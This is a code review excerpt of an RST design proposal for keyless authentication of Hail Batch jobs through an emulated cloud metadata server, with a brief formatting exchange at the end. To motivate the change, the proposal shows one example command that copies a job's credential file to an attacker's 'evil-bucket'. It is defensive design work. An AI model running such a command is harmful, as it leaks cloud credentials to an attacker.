rfc/0000-keyless-job-auth.rst

```diff
@@ -0,0 +1,204 @@
+
+
+Motivation
+----------
+
+Exposing long-lived credentials to user jobs poses a security risk,
+as these credentials could be easily exfiltrated by the user or any malicious
+code the user inadvertantly runs. The following is all that needs to run to
+exfiltrate these credentials.
+
+.. code-block:: python
+   j.command('gcloud storage cp $GOOGLE_APPLICATION_CREDENTIALS gs://evil-bucket/')
+
+Hail operators rotate GSA keys quarterly, so such an exfiltration could provide
+a malicious actor access to all resources granted to the robot identity for up
+to 90 days.
+
+Cloud providers avoid persisting long-lived credentials on user machines through
+the Metadata Server interface, an HTTP endpoint available on a
+`link-local https://en.wikipedia.org/wiki/Link-local_address`_ address which can
+issue access tokens for the identity assigned to the virtual machine. Available
+metadata in GCP is described [here](https://cloud.google.com/compute/docs/metadata/predefined-metadata-keys). This interface has the following advantages:
+
+- Unlike long-lived keys, these tokens are short-lived (e.g. 1 hour), reducing
+  the potential attack window following exfiltration.
+- The metadata server can be configured only to issue certain scopes, so the
+  operations a job can perform may be restricted. It is not possible to scope
+  GSA keys and AAD SP client secrets.
+
+This proposal seeks to provide an emulated metadata server to Batch jobs and remove
+jobs' dependence on long-lived credentials.
+
+Removing this dependency also opens the door to future work of removing
+long-lived credentials entirely from the system in favor of alternative approaches
+to gaining access tokens from the cloud identity providers (discussed briefly 
+in Inspiration & Alternatives).
+
+
+Proposed Change Specification
+-----------------------------
+
+Batch jobs access credentials on the filesystem through the
+``$GOOGLE_APPLICATION_CREDENTIALS``/``$AZURE_APPLICATION_CREDENTIALS``
+environment variables (EVs). Under this change, the files and EVs will still be
+available but their use will be deprecated in the documentation.
+
+Currently, Batch uses firewall rules to block access to the metadata server for
+user jobs, permitting users access would allow them to impersonate the batch worker.
+This proposal would allow packets from jobs destined to ``169.254.169.254`` but
+redirect those packets to a web server owned by the Batch Worker.
+The Batch Worker can then use the
+credentials for the job in question to generate access tokens on behalf of the
+robot identity and distribute them upon request.
+
+The following sequence diagrams illustrate how a Batch job obtains credentials
+to access a cloud resource in the current system and under the proposed change.
+The diagrams use GCP-specific terms and URLs, but the interaction is largely
+the same in Azure.
+
+
+Current System
+==============
+
++-----+                                                +-----+              +-----+
```

Comment:
I think a simple triple-backtick will make this legible.

Reply:
we're in RST not markdown, but figured it out